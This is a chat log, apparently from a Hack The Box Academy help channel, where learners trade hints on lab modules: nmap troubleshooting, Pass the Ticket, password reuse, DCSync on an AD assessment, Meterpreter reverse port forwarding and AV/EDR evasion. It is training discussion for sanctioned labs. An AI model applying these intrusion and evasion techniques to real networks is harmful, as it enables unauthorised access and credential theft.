yes but there is nothing after putting that in my webbrowser

I will attempt to use a different wordlist.

On AD Skills Assessment II, how do you find the confit file that shows how to connect to the MSSQL instance?

Where do windows users love to stash juicey configuration files?

Solution solved, disregard.

ill double check

first i didn't even check the text but i did like ||MAC, MAC Address, MAC-Address, Media Access Control, MAC Addressing|| and and a load more i cant remember before i got to the right one 😅 HTB should really apply regex to Qs imo to take various answers and at the very least, trim spaces.. so many times i submit flags with a space at the end

I would like them to regex answers yeah

Cheers, working on Footprinting medium lab right now. Found ||the important file|| but the content gives me a failed login. What am I missing? can't seem to find anything else to work with.

works for me, you using the nessus web interface port? 8834?

yes. but nessus is not the target, it's my computer

I dont have notes on that assessment but is that the one where you find ||the key?|| if so you may have some formatting issues from copy pasting. Was easier to paste into sublime and save it that way.

if thats not what im thinking about then oh well

huh?

Ugh I can’t remember

or have I to use a special machine (vm) to make it works

Go through your notes for the module

you've lost me now

ahhahahha

Can I PM you to not poluate the chat??

For AD module? Or password attacks?

Sure

for AD module

They cover it pretty explicitly in one of the sections

@real cedar continue footprinting to be sure you can continue with it... the password only is not working

DM if you still have issues

It's a channel that does not require verification of account to access

Is it about ||the port 1433 not being used but 1434? Havent seen the typical 1433 with netstat. If not, I'll continue looking.||

Thanks! I’ll go look now

I looked there before but somehow missed it. I feel like an idiot lol. Thank you!

Np it happens, aggressive note taking helps alot with these modules!

I learned my lesson after footprinting lol

My notes from when I started to now are night and day

"oh it also is doing this function... That helps me with my foothold"

To the point ive considered redoing earlier modules just to re-up my assessment notes

That's kinda what I'm doing as I redo my notes, including rerunning the labs

Theres a lot of common questions that Im just like, "welp my notes literally dont exist, and I was able to answer it a couple weeks after I did it from memory, but its been too long now"

^

It makes me take 3 times as long as the time on the module, but hey - I suppose it's good practive

Hi

"oh yeah for this remote protocol I need to add a semicolon after everything"

Yeah but the alternative is you get people who dont take notes then take literal weeks on the assessment. Good notes saves time overall.

I'm new to this the hack the box
But could someone help me with a problem with a tier1 machine?

wdym tier 1 machine

this is for academy content, if its not module related, ask a more relevant channel. Verify your account if you cant see em

#welcome

Ok I'll see there then, thanks!

I'm working my way through File Transfers: Miscellaneous File Transfer Methods.

In the PowerShell Session File Transfer section. Is the computer DC01 a compromised machine, and DATABASE01 another machine that we are trying to transfer files to?

Password Attacks in Pass the Ticket from Linux, here is an image of my setup. What am I missing. I am getting connection refused. I have verified that NfdDml is the right one, but converting it and running it on the windows machine.

nevermind I got it, had to remove the proxychain that was already in there

I have a question. I am doing the "getting started" module, and the question is

"Perform an Nmap scan of the target and identify the non-default port that the telnet service is running on. "

If i do the nmap -p- "ip", scan it shows an error of "Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn"

But if i do a -Pn with it the scan just seems to go to infinity.

Is there a realistic command that I could do

its not going on infinity, its just taking a long time

( waiting for 30minutes now )

you can drop -p- and let it default scan the top most common ports, can feed it timing flags like -T5 to speed it up, or add verbose output -v so you can see it is indeed doing stuff

You should also try manually pinging the target to make sure its up and reachable

You could always try a --top-ports 1000

I know its reachable, since I was able to -p8080 for the previous question, and it turned out the result ( also did the ping 😛 )

then yeah more patience or any of the other flag options I suggested

Are you sure the target machine hasn't run out of time?

that too

I just checked that too, and if i do any single use ports it scans in 3sec

often for actual boxes ill do a lighter initial scan and then do a full scan in the background while I'm investigating other stuff cause yeah a -p- is going to take awhile.

On a live across the internet box a -p- scan can be a couple hours or more

I just came here, since it felt like a long time to do the question for such a rudimentary question

Yeah, tbh I don't remember it taking that long - it would have stuck out I'm sure. Which section are you in in that module, I'll have a look.

see if it does the same for me

Pentesting Basics - Service Scanning

Some machines for me have been a bit slow today

But regardless thank you madfox 4st1nus and moondark for all the informations (figured its stupid to @ ping for a thank you)

as long as you dont dm without asking I dont care lol

also if you're gunna stick around the server you should probably verify your account #welcome

So many random DM's I don't even answer that many questions lol

its just guranteed ignore

done!

So I've had a look and you don't need to do a full scan with -p-

just a normal scan will give you the answer

look for unusually high numbers.

or run a normal scan with -sV

Did you have to do the -Pn ?

Nope

Reset your target machine.

I did it like 6 times, but after an hour on this question, I felt asking in modules was my only hope

So when you do nmap <IP> it says that the target might be down?

also are you on the pwnbox or in vpn

I am on pwnbox

hmm usually connection is better in pwnbox

Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn

are you 100% sure you're typing the right IP?

like I said I answered the previous question and when I do the -v like madf0x suggested, I do see the progress

but if you've reset your machine, you might just be pinging someone else's now.

This is what I get now

when i do the -v

it scans

and then it stops

run nmap on this:

fuck me

Yeah, I think you were typing the wrong IP or something.

Well done! Delete your spoiler though.

I dont see a spoiler

Well, thank you for your help boys

i removed it

gotcha

I've done that

lol me too. For ages, that's why I was sure that was the issue. Past pain.

Password Attacks - Pass the Ticket (PtP) from Linux

Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01. Submit the contents as your response (the flag starts with Us1nG_).

This one has stumped me, I thought I found another ticket after running linukatz with root on MS01. It was bi3e6S, but when I go to convert it I get errors. If someone can give me a nudge for the flag.

Remember that LINUX01$ is the machine account. The section talks about impersonating the machine account

Thanks when I get back to my computer I’ll read up on that a bit more

Happy New Year all. I'm stuck on the hard Lab Footprinting I managed top get the version of SNMP

can anyone provide a tip please

I've spent a couple of days enumerating the services

Did you enumerate the snmp service?

can anyone help with the "password Attacks" module?

http://dontasktoask.com

lesson learned on trying to just do the AD module... skills assessment been kicking my ass for a bit now lol

its one of the most challenging modules in the whole course

the second assessment took me 8 hours

AD In general is very very challenging

I got around halfway through the Offshore pro lab and realized I needed some more time with AD, so I just decided to jump into this one

ok, i am on the password reuse/Defaults module. it says to gain the credentials for mysql but i saw the conf file and the only ip for it is in the target pc so i cant use brute force attacks. its also a loopback address host. the user mysql. i just need to find a way to get around root to manipulate the conf file to open the port up

You are grossly off base with what you need to do

ok, so im running into another issue with the pivoting module. This time on the meterpreter section. Again im trying to get a meterpreter session from the internal windows host. I can see the connection come through if i set up a nc listener on the ubuntu host. However, im not getting a callback on my Attack machine. Even using netcat, nothing comes through. Any ideas why? This is my reverse port forward command: portfwd add -R -l 8081 -p 8443 -L 10.10.14.67

the module is about password reuse and default creds, messing with config files is entirely out of scope

your image literally has a connection coming in?

Thats on the ubuntu machie

sorry

should have clarified

I get nothing on my attack machine

sure you got all your payload settings correct?

Im double checking now, but im 99% sure i did everythign correctly

tbh I dont like metasploit port forward at all and basically drained most of my knowledge about it immediately after I didnt need it anymore

Yea, im not such a fan either. Just curious as to why its not working

Question regarding Windows Fundamentals Skills Assessment. Could anyone guide me on how to create a new security group? I can't remember that be taught in the module

Alright. I give up with metasploit port forwarding lmao.

i see, but the port to mysql is closed. how am i suppose to test creds if it is closed?

iirc you should have ssh creds from the previous exercise.

i do, i tested both. none worked.

yeah you're supposed to login with the previous creds then try to find the mysql creds

i get stopped for not having root permissions

They arent mysql creds lol. You need to ssh to the machine to access mysql

what were you trying to run that gave you root perm error?

i do ssh in, that is the only way to test them as i stated the only access is a local host

its the only access you need

the mysql client from localhost can access the server just fine

Now all you need to do is read the section. What you need to do is explained in the section very very clearly

the port is only closed externally

Think about the name of the section

i ssh into the target pc then try to access mysql from inside with the creds from previous section. it did not work

no no

you ssh with creds from the previous section then you try to figure out the mysql creds

Again, think about the name of the section

Everything you need is given to you in the section

yea. use mysql as the user and then use the old passwords with it

Youre completely glossing over half of the section title

who said mysql was the user?

its in the confd file

and who said it was old password for the password?

Bro forget about the conf

thats for the server user, not the db user

Just think about the title of the section. Thats it. Telling you anything more than that is borderline giving you the answer

the mysql server runs as the mysql user for its process. It has its own authentication for the actual database stuff. Thats what youre trying to get into.

another way to look at it, reusing the creds for ssh already satisfies the password reuse half of the section.

thanks. I ve been looking at the screen more than an hour without any ideas. But. after reading your comment. I ve finished it within 5 min

i used both creds from within target machine.

@low mica hey dont take this the wrong way here but I need you to do a couple of very specific steps okay?

ok

Are you with me?

yes

First, I want you to type out the full section name

right here in chat to me

Password Reuse/Default Password

Okay good

Now, when you ssh in, what part of the section name did you use?

sam

I believe the issue with it is a bandwith one. Theres not enough bandwidth on the VPN for it to work. I was only ever able to get it to work from Pwnbox

no, section name, not user name

which aspect of the section name did you utilize

password reuse

Ah. I see.

Okay good

so password reuse checked off

so what part of the section name do you think needs to be used for the next part of the question?

default password?

Good good

now, where in the module do they mention a tool for checking default passwords?

default creds sheet

Good

Thats all, have fun and good luck

thanks my guy

so after getting the admin ntlm hash and verifying that auth works on the DC, im a bit stumped on the ideal next move

np

don't know what question/module youre on but getting admin hash to DC and authing is usually gg you win right there

NTDS.dit is always juicy

@thorn urchin its the skills assessment so i know im looking for the flag which i feel like i can get with what i have

but bigger picture, not sure what the next real world move would be

rdp to the machine, or some sort of shell?

Yeah

or just DCsync

That would depend on your goal, and whether you're trying to avoid being caught.

Is anyone available to help me with creating a security group? Everywhere I look it says to do it through Active Directory but I cannot access that through the workstation

admin on domain controller is basically endgame unless youve got multiple forrests or you got in in day 2 of a two week assessment

nut generally youd opt for some form of shell on the DC

so i did a dcsync to get the hash im using, would you gain anything new by doing dcsync again using the admin ntlm hash?

no

youd DCsync if you had gotten the admin hash some other way and wanted to dump all the users hashes

its completed. i found it. greatly appreciate it

gratz

Remember, very rarely do you have to reach outside of exactly what the section says to do. Assessments are mote likely to demand some creativity, but if youre trying something totally outside the sections content youre probably on the wrong path unless you really know what you're doing (using ffuf yo make inclusion module easier for example)

even in those scenarios it should be, "I know exactly what it intends, but I have a better way"

yea i went far right for sure lol im starting to see that its easy to overthink these modules

seems pretty accurate, this whole skills assessment is much easier using a pivot... wish i had done that whole module first

Yeah using pivots has been my number 1 recommendation for people doing the AD assessment

it led me into a minor trap that took a little thinking to get out of, but other than that it made the rest of my life easier

They dont tell you to use pivots in the AD section?!?

How tf do you do AD without pivoting 😆

Nope, but its after the pivoting module in the course

Any help with creating a security group?

youre supposed to be able to connect the two pieces of knowledge together on your own.

fair point

sorry not ignoring you, I just havnt done that module and don't know at all.

presume same goes for others in chat right now

I can't find anything on how to create a security group in the module either and this is a beginner module

most of the individual sections are already configured and it seems pretty self contained using the existing tools, but the skills assessment is a different beast

yeah cause the assessment gives you a realistic foothold and says good luck

i had the wrong impression about the modules though, i assumed they were built mostly as stand-alone elements

Some are

if i had known that, i wouldve approached it differently

since i was just looking for an AD-specific track to brush up while doing Offshore

I mean its definitely entirely doable without it, its just a lot harder if you dont know pivots at all

and adding pivots to the module would be a bit out of scope

Yea thats a fair point

ive done some pivoting before, but it definitely caught me unprepared here. was already using the pivoting in Offshore

but the SA definitely was easier by just doing what was needed lol

without the pivot, i was trying to use enter-pssession... and that was just janky

Personally I also just prefer dropping minimal amount of tools on the target, and you autobypass av and edr if you stick with network tools where you can, so I did the majority of the lab using the linux options wherever reasonable to do so. Thatd been absolutely impossible without pivoting.

there was just one moment where the linux analog for a certain tool returned mostly the same information but crucially not the piece I needed.

skills assessment pt 1... finally lol

oh that was the pt 1 you were on lol

get ready, pt 1 was the warm up, pt 2 is the ride

pt 1 was like two or three hours for me, pt 2 was a full 8 hours, just for context. Youre mileage will obv vary

yes i did and its v3

Ok I think I found the cmdlet to add a security group but powershell is not recognizing it

tried to use braa with no go

did you find the community string first

no

no result as cant scan snmpv3 without auth

Ok I'm fairly confident I found the cmdlet to make the security group but Powershell won't recognize, anyone got any ideas?

either youre making an assumption here or Im severely misremembering that lab

the lab has 6 ports open imap,pop3, ssh and udp 161

snmp is v3 and im unable to find anything using braa snmpwalk is only for 1 and 2c

well I dont have time to double check that lab right now, so unfortunately good luck

hard lab right? I may be able to double check it later after dinner plans

if anyone can throw me a hint i would appreciate it. Thanks for responding @thorn urchin

🖖

What is broken about it?

target machine unreachable

Are you connected to VPN?

yes...

Have you tried resetting the machine?

i've tried spawning machines from other modules and have had no issues connecting to those. i've had the same issue for a few days with only windows privesc

yes...

And you've tried connecting to it using the methods provided?

are you able to connect to the machine?
windows privilege escalation skills assessment I

I'm busy working rn gimme an hour to see unless someone else that's done windows priv-esc can give you more info

Remember that windows by default has a firewall turned on and thus will not respond to pings

^

You'll run into many things where just pinging will get you dead in the water

Some of the modules, or sections, nmap won't get you anywhere because it's a webpage requiring website enumeration

🤮

thank you

Its never a good idea to blindly rely on ping for host discovery. 99% Of firewalls will drop ICMP Packets

If you know a machine is up but it isnt responding always use the -Pn nmap flag (It disables ping host discovery)

i'm familiar with the flag. never come across a scenario where it was needed in 3+ years of hack the box though. definitely some valuable real world advice and i appreciate that

thanks again

Np

Hello, please can someone explain why this code doesn't work

#!/bin/bash
arr=(1 2 3 4 5)
for i in $arr
do
echo $i
done

it just prints 1

$arr will not expand the array
you need to use something more like "${arr[@]}"

Thank you

it works

After joining machine. How we know what to do in HTB

well if you're doing a module from http://academy.hackthebox.com then whatever the module is teaching you to get the question asked; if you're doing a box from http://www.hackthebox.com then your question is going to be better in #boxes ; I recommend starting with the Starting Point/Getting Started sections

I want to solve problems only

Well if you want to know what to do; you can always look up how to get into the system or get the information you are looking for. But if you do not know how to start; then it's kinda hard to help you

But if you're just looking to answer questions on the academy side without actually reading the module then you're not really learning

can anyone give me a hint for the Footprinting - Hard Lab

as the modules mostly walk you through

may I dm to know where you're at on the footprint - hard to avoid spoiler?

sure

hi

Another question about the pivoting module 😅 :

In the section "SSH for Windows: plink.exe" you are encouraged to boot up a windows attack box and use plink to establish a dynamic port forward. Problem is, im getting the shown error when trying to connect to the target. Anyone know how to fix it? Ive tried updating to the newest version of putty, ive tried newer plink.exe binaries, ive tried old ones. Nothing seems to work. Before anyone asks, yes im connected to the vpn. I can ping the target as shown

Think you might need to modify your openvpn configuration file on the windows host

Hmm. I didnt think of that. Ill give it a try

something to do with the encryption of your host and target not agreeiing on a protooll

Yea, i assumed it was to do with ssh

might be an option in the ovpn configuartion file where you can choose an encryption might try to force it to only use 1 kind of encryption. Probably older weaker encryption might make it succesfull

nope. Not a vpn thing

its an issue with putty

research has confirmed lol

whats wring with it?

I have no idea lol

thts the problem

Everything i can find just says update putty to the latest version, but my putty is already updated

I mean if its issues with the programming then might just move on unless you want to delve into the source code and fix it and recompile it lol

lmao. Nah im good

was just hoping someone would show up with some voodoo magic to get ti working lol

use linux :^)

there's the voodoo

Lmao. For most things I do. But i do want to know how to do it from a windows machine

ive run into issues with the linux kernel causing bugs and kernal programming way freaking beyond me lol. Then you just try to fond work arounds

this

just do a work around

Nah I know that Tux is attempting to do it the way nature intended

because it insinuates using a windows host

If youre trying to evade detection connecting from a linux machine in a primerily windows environment will get you caught almost instantly

Im just tryna learn as much as i can lol

imagine learning

You never know. One day youll be doing an assesment and youll need to create a dynamic port forward from a windows machine. Then youll wish you figured this issue out lol

no necessarily. Its all just data and packets going across a network. Alot of linux tools mimick the data just as if its coming from a windows host

Thats 110% not true lol

Its very easy to tell the difference between a windows and linux machine from a defense perspective

^ I forget how it's done usually it's through the default ping requests that happen prior to an attack that blanket check for ports

Yea

Cuz you can determine OS based on TTL of ICMP packets

can you modify TTL; yes

you can change the TTL tho

if your just looking at network packets they can be spoofed unless the defender can reach the attackers actual machine with a scan of somekind.

but USUALLY most people don't

but there are other ways of differentiating between windows and linux machines

especially if you have admin access to the domain lol

sips idk much about blueteam side stuff

I dont either. I just know it can be done

Ive never really delved into blue team stuff but this one example of a time when it would be really good to know some blue stuff

I think really to be effective at pentest/red team, you should at least know how blueteam detects you

i.e. firewall rules and stuff like that\

Yea

Of course

but the more you know the better

Best way to avoiud being detected is to know how people try to detect you

even if it's basics like, usually port 53 is used as a zone transfer and is trusted by internal networks

And i wanna work my way up to red teaming eventually so this is all stuff i gotta know

well yea of course

Same thing with 80 and 443

altho using port 80 can set off flags sometimes

that's why it's usually proxied as 8080 yeah?

i forget what 443 often is proxied as

8443

ah yeah

very creative lol

APTS (advanced persistent threats) like intel and nation state cyber warfare commands. THey usually will create custom tools and software from scratch tailored to the computers and network theyre trying to target. Costumed designed to get around their particular defenses nad software configurations.

I know most of my basic networking ports though because I have an actual net+ cert

yes i know

and you know what it comes in handy

nice

I JUST THOUGHT of something that can help me with my lab notes in obsidian; create a common port checklist; then delete the ones that aren't scanned